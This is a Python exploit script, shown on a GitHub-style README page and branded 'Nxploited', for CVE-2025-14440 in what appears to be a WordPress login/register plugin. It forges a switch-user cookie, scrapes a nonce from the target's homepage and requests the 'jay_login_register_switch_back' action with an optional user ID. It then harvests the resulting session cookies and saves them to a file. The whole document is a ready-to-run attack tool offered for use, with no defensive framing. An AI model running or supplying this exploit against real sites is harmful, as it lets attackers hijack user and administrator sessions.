README.md
Rendering markdown...
# -*- coding: utf-8 -*-
# By: Nxploited
# GitHub: https://github.com/Nxploited
# Telegram: https://t.me/Nxploited
import sys
import requests
import re
import os
import argparse
import logging
from urllib.parse import urlparse, urlunparse
SCRIPT_AUTHOR = "Nxploited"
GITHUB = "https://github.com/Nxploited"
TELEGRAM = "https://t.me/Nxploited"
HEADERS = {
"User-Agent": "Mozilla/5.0 (Nxploited Exploit Script)",
"Accept": "*/*",
"Connection": "close",
"Cookie": "jay_login_register_switched_from_user=1"
}
NONCE_REGEX = r'_wpnonce=([a-fA-F0-9]{10,})'
COOKIE_FILENAME = "extracted_cookies.txt"
TIMEOUT = 8
LOG_FORMAT = "[%(levelname)s] %(message)s"
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def sanitize_url(url):
url = url.encode('utf-8', 'ignore').decode('utf-8', 'ignore')
if not url.lower().startswith(("http://", "https://")):
url = "http://" + url
parts = list(urlparse(url))
parts[2] = os.path.normpath(parts[2])
return urlunparse(parts)
def extract_nonce(target_url):
try:
resp = requests.get(
target_url.rstrip('/') + '/',
headers=HEADERS,
verify=False,
timeout=TIMEOUT
)
if resp.status_code != 200:
logging.error(f"Initial request returned status code {resp.status_code}")
return None
match = re.search(r'href="[^"]*jay_login_register_switch_back[^"]*"', resp.text)
if not match:
logging.error("Could not find the switch_back link in response.")
return None
nonce_match = re.search(NONCE_REGEX, match.group(0))
if nonce_match:
return nonce_match.group(1)
logging.error("Nonce not found in the href attribute.")
except Exception as e:
logging.error(f"Exception extracting nonce: {e}")
return None
def exploit(target_url, nonce, user_id):
exploit_params = {
"action": "jay_login_register_switch_back",
"_wpnonce": nonce
}
if user_id:
exploit_params["id"] = user_id
try:
with requests.Session() as session:
session.headers.update(HEADERS)
resp = session.get(
target_url.rstrip('/') + '/',
params=exploit_params,
verify=False,
timeout=TIMEOUT
)
cookies = session.cookies.get_dict()
has_cookies = bool(cookies)
if has_cookies:
cookie_str = "; ".join(f"{k}={v}" for k, v in cookies.items())
logging.info(f"[SUCCESS] Exploitation successful. Cookies:\n {cookie_str}")
store_cookie(target_url, cookie_str)
else:
logging.warning("No cookies returned. Exploitation may have failed.")
return has_cookies
except Exception as e:
logging.error(f"Exception during exploit: {e}")
return False
def store_cookie(target_url, cookie_str):
try:
parsed = urlparse(target_url)
site = f"{parsed.scheme}://{parsed.netloc}"
with open(COOKIE_FILENAME, "a", encoding="utf-8") as f:
f.write(f'{site}: {cookie_str}\n')
logging.info(f"[INFO] Cookies saved to: {COOKIE_FILENAME}")
except Exception as e:
logging.error(f"Failed to store cookies: {e}")
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-14440 | Exploit By Nxploited (Khaled Alenazi)"
)
parser.add_argument('-u', '--url', required=True, help="Target URL (with or without http/https)")
parser.add_argument('-id', '--id', required=False, help="User ID to use for exploitation")
args = parser.parse_args()
print("=======================================================")
print(f"# CVE-2025-14440 | Exploit By {SCRIPT_AUTHOR} (Khaled Alenazi)")
print(f"# GitHub: {GITHUB}")
print(f"# Telegram: {TELEGRAM}")
print("=======================================================")
target_url = sanitize_url(args.url)
user_id = args.id
logging.info("Sanitized target URL: %s", target_url)
logging.info("Attempting to extract Nonce...")
nonce = extract_nonce(target_url)
if nonce:
logging.info(f"Extracted nonce: {nonce}")
else:
logging.error("Failed to extract nonce! Exiting.")
sys.exit(1)
logging.info("Attempting exploitation...")
if exploit(target_url, nonce, user_id):
logging.info("Exploit process completed. Check extracted_cookies.txt.")
else:
logging.warning("Exploit did not yield cookies. Target may not be vulnerable or input may be incorrect.")
if __name__ == "__main__":
main()